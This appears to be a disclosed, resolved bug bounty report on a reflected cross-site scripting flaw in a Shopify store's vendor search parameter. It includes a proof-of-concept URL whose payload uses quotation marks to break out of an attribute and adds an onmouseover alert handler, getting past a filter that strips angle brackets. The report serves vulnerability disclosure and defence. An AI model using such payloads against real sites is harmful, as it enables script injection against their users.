XSS *.myshopify.com/collections/vendors?q=

Disclosed: 2018-04-08 10:25:54 By gromoza To shopify
Medium
Vulnerability Details
The WAF cuts `<` and `>`, but `"` and `'` still get in.

1. [PoC example link](https://lostvalues.myshopify.com/collections/vendors?q=X" onmouseover="alert('XSS')" style="font-size: 1001pt;")
2. Mouse over X
3. ..
4. XSS alert message

## Impact

XSS attack
Report Stats
  • Report ID: 324136
  • State: Closed
  • Substate: resolved
  • Upvotes: 34